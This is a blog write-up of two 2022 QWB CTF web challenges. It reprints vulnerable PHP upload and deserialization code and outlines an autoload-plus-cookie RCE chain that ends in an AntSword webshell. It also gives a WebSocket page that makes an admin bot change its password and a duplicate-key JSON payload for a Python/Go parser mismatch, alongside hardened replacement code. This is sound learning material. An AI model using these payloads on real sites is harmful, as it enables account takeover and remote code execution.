2022 QWB CTF (强网杯) web: notes on selected challenges


It has been a long time since I posted. I started several posts at once and none of them are finished, and my computer broke, so this got delayed for a while. Let me first look at the QWB web challenges; they are of a high standard. I could not find a running environment, so I only went through the write-ups and reconstructed them from memory.

RceFile

The source code is obtained from www.zip.
upload.php

<?php
include "config.inc.php";

$file = $_FILES["file"];
if ($file["error"] == 0) {
    if($_FILES["file"]['size'] > 0 && $_FILES["file"]['size'] < 102400) {
        $typeArr = explode("/", $file["type"]);
        $imgType = array("png","jpg","jpeg");
        // precedence bug in the challenge code: `!$typeArr[0] == "image"` parses as
        // (!$typeArr[0]) == "image", and `|` is bitwise OR, so in practice only the
        // MIME subtype (png/jpg/jpeg) is checked; the main type is never enforced
        if(!$typeArr[0]== "image" | !in_array($typeArr[1], $imgType)){
            exit("type error");
        }
        $blackext = ["php", "php5", "php3", "html", "swf", "htm","phtml"];
        $filearray = pathinfo($file["name"]);
        $ext = $filearray["extension"];
        if(in_array($ext, $blackext)) {
            exit("extension error");
        }
        $imgname = md5(time()).".".$ext;
        if(move_uploaded_file($_FILES["file"]["tmp_name"],"./".$imgname)) {
            array_push($userfile, $imgname);
            setcookie("userfile", serialize($userfile), time() + 3600*10);
            $msg = e("file: {$imgname}");
            echo $msg;
        } else {
            echo "upload failed!";
        }
    }
}else{
    exit("error");
}
?>

showfile.php

<?php
include 'config.inc.php';

foreach ($userfile as $file){
    $file=e($file);
    echo "<li><a href=\"./{$file}\" target=\"_blank\">" . $file . "</a></li>\n";
}
?>

index.php

<?php
include "config.inc.php";
?>

config.inc.php

<?php
// no callback: registers the default autoloader, which looks for <classname>.inc / .php
spl_autoload_register();
error_reporting(0);

function e($str){
    return htmlspecialchars($str);
}
// unserialize() of a client-controlled cookie: any class name it contains is passed
// to the default autoloader registered above
$userfile = empty($_COOKIE["userfile"]) ? [] : unserialize($_COOKIE["userfile"]);
?>

A similar challenge: 2017 Xiangxiang Cup (湖湘杯) write-up, web400.

spl_autoload_register() with no arguments automatically includes .inc files named after the class being loaded.
Upload a file with the .inc extension, changing the image type field so it passes the check.
Then visit /showfile.php with a cookie containing a serialized object whose class name is the uploaded file name; that gives RCE.

I am not fully clear on the exact mechanism; it appears the cookie is deserialized and that executes the command.
When connecting with AntSword (蚁剑), just include the cookie.
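As an added example (not the challenge's code and not the author's exploit), here is how the upload and cookie handling could be written so that the chain above does not exist: the autoloader is restricted to one directory, the cookie carries HMAC-signed JSON instead of serialize() output, the extension check is an allowlist cross-checked against the sniffed content type, and the stored file name is generated server-side. The `./uploads` directory, the `lib/` autoload path and the `COOKIE_KEY` environment variable are assumptions of this example, and PHP 8 is assumed for `str_contains`.

```php
<?php
// Hardened counterpart to the challenge's upload.php / config.inc.php (added example).
declare(strict_types=1);

// 1. Never register the default autoloader: with no callback, any unknown class name
//    becomes an include of <classname>.inc/.php from include_path. Load only from lib/.
spl_autoload_register(function (string $class): void {
    $file = __DIR__ . '/lib/' . basename(str_replace('\\', '/', $class)) . '.php';  // assumed layout
    if (is_file($file)) {
        require $file;
    }
});

const COOKIE_NAME = 'userfile';

// 2. Client-side state is JSON plus an HMAC, so unserialize() never touches a cookie.
function cookieKey(): string
{
    $k = getenv('COOKIE_KEY');  // assumption: secret supplied via the environment
    if ($k === false || strlen($k) < 32) {
        throw new RuntimeException('COOKIE_KEY not configured');
    }
    return $k;
}

function encodeUserFiles(array $files): string
{
    $payload = json_encode(array_values($files), JSON_THROW_ON_ERROR);
    return base64_encode($payload) . '.' . hash_hmac('sha256', $payload, cookieKey());
}

function decodeUserFiles(?string $cookie): array
{
    if ($cookie === null || !str_contains($cookie, '.')) {
        return [];
    }
    [$b64, $mac] = explode('.', $cookie, 2);
    $payload = base64_decode($b64, true);
    if ($payload === false || !hash_equals(hash_hmac('sha256', $payload, cookieKey()), $mac)) {
        return [];  // tampered or unsigned: treat as empty, do not trust any of it
    }
    $files = json_decode($payload, true);
    if (!is_array($files)) {
        return [];
    }
    // accept only the exact shape this code writes: generated names with an allowed extension
    return array_values(array_filter(
        $files,
        fn($f) => is_string($f) && preg_match('/^[a-f0-9]{32}\.(png|jpe?g)$/', $f) === 1
    ));
}

// 3. Allowlist the extension, verify it against sniffed content (not $_FILES['type'],
//    which the client sets), and choose the stored name ourselves.
const ALLOWED = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg'];

function storeUpload(array $file, string $dir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if ($file['size'] <= 0 || $file['size'] >= 102400) {
        return null;
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        return null;  // allowlist: .inc, .phtml and every other extension are rejected
    }
    $sniffed = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($sniffed !== ALLOWED[$ext]) {
        return null;  // the bytes must actually be the image type the extension claims
    }
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dir . '/' . $name)) {
        return null;
    }
    return $name;
}

$userfile = decodeUserFiles($_COOKIE[COOKIE_NAME] ?? null);
$stored = storeUpload($_FILES['file'] ?? [], __DIR__ . '/uploads');  // assumed upload directory
if ($stored === null) {
    exit('upload rejected');
}
$userfile[] = $stored;
setcookie(COOKIE_NAME, encodeUserFiles($userfile), [
    'expires' => time() + 3600 * 10, 'httponly' => true, 'samesite' => 'Lax',
]);
echo htmlspecialchars("file: {$stored}", ENT_QUOTES, 'UTF-8');
```

The upload directory should additionally be served with script execution disabled in the web server configuration, so that even a misclassified file is never interpreted; the allowlist and the signed cookie remove the two links of the chain (attacker-chosen extension and attacker-chosen class name), and the restricted autoloader removes the third.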

babyweb

There are three functions: help, change password, and visit a page.
To log in as the admin account, the idea is to make admin visit a JS page that changes the password.

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8">
        <title></title>
    </head>
    <body>
        <button id="btn" type="button">Click me to send the request</button>
        <script>
        // the bot's WebSocket endpoint listens on localhost, so any page opened in
        // the admin's browser can reach it and issue a command
        var ws = new WebSocket("ws://127.0.0.1:8888/bot");
        ws.onopen = function () {
            var msg = "changepw 123456";
            ws.send(msg);
        };
        </script>
    </body>
</html>

I am not sure what the page looks like after logging in; the following steps come from the write-up.
You need to buy the hint; a code audit shows that the inconsistent JSON parsing between Python and Go can be used to bypass it.

{"product":[{"id":1,"num":0},{"id":2,"num":0}],"product":[{"id":1,"num":3},
{"id":2,"num":3}]}
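As an added example (not code from the challenge or the write-up), the following PHP shows how a service that fronts several parsers can close this class of bypass: it detects duplicate keys in the raw body, rejects the request, and otherwise forwards a single canonical re-encoding so that the Python and Go components can never disagree about which product list they saw. The request shape (a `product` list of `id`/`num` pairs) is taken from the payload above; the function names and the sample inputs are mine.

```php
<?php
// Added example: refuse JSON bodies with duplicated keys before any service parses them.
// Each JSON library resolves duplicate keys its own way; if two services in a chain
// disagree, one "product" list reaches the validator and another reaches the code
// that fulfils the order. Rejecting duplicates at the edge removes the ambiguity.
declare(strict_types=1);

// Scan the raw text and report whether any object contains the same key twice.
// Keys are compared after JSON unescaping, so "a" and "\u0061" count as the same key.
function jsonHasDuplicateKeys(string $json): bool
{
    $len = strlen($json);
    $stack = [];  // one frame per open container: ['obj' => true, 'keys' => [...]] or ['obj' => false]
    $i = 0;
    while ($i < $len) {
        $c = $json[$i];
        if ($c === '"') {
            // consume a string literal, stepping over backslash escapes
            $start = ++$i;
            while ($i < $len && $json[$i] !== '"') {
                if ($json[$i] === '\\') {
                    $i++;
                }
                $i++;
            }
            $raw = substr($json, $start, $i - $start);
            $i++;  // closing quote
            // a string followed (after whitespace) by ':' inside an object is a key
            $j = $i;
            while ($j < $len && strpos(" \t\r\n", $json[$j]) !== false) {
                $j++;
            }
            $depth = count($stack);
            if ($j < $len && $json[$j] === ':' && $depth > 0 && $stack[$depth - 1]['obj']) {
                $decoded = json_decode('"' . $raw . '"');
                $key = is_string($decoded) ? $decoded : $raw;
                if (isset($stack[$depth - 1]['keys'][$key])) {
                    return true;
                }
                $stack[$depth - 1]['keys'][$key] = true;
            }
            continue;
        }
        if ($c === '{') {
            $stack[] = ['obj' => true, 'keys' => []];
        } elseif ($c === '[') {
            $stack[] = ['obj' => false];
        } elseif ($c === '}' || $c === ']') {
            array_pop($stack);
        }
        $i++;
    }
    return false;
}

// Gateway-side reader: reject duplicates, parse exactly once, validate the shape, and
// hand every downstream service the canonical re-encoding so they all see one object.
function readPurchase(string $raw): ?array
{
    if (jsonHasDuplicateKeys($raw)) {
        return null;
    }
    try {
        $data = json_decode($raw, true, 8, JSON_THROW_ON_ERROR);
    } catch (JsonException $e) {
        return null;
    }
    if (!is_array($data) || !isset($data['product']) || !is_array($data['product'])) {
        return null;
    }
    foreach ($data['product'] as $item) {
        if (!is_array($item) || !isset($item['id'], $item['num'])
            || !is_int($item['id']) || !is_int($item['num']) || $item['num'] < 0) {
            return null;
        }
    }
    return ['canonical' => json_encode($data), 'product' => $data['product']];
}

if (PHP_SAPI === 'cli') {
    // constructed inputs: the write-up's duplicate-key payload and a clean request
    $attack = '{"product":[{"id":1,"num":0},{"id":2,"num":0}],"product":[{"id":1,"num":3},{"id":2,"num":3}]}';
    $clean  = '{"product":[{"id":1,"num":0},{"id":2,"num":0}]}';
    var_dump(jsonHasDuplicateKeys($attack));
    var_dump(readPurchase($attack));
    var_dump(readPurchase($clean)['canonical']);
}
```

The scanner is deliberately independent of any JSON library: the whole point is that library behaviour on duplicates is implementation-defined, so the decision has to be made on the raw bytes. Passing only the `canonical` string onward (rather than the original body) means a later component cannot re-parse the ambiguous text even if it is written in another language.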

Summary

The QWB challenges really are expert-level; I still have a lot to learn.


Author: kingkb
Reprint policy: Unless otherwise stated, all articles in this blog are under the CC BY 4.0 reprint policy. If reproduced, please indicate the source: kingkb!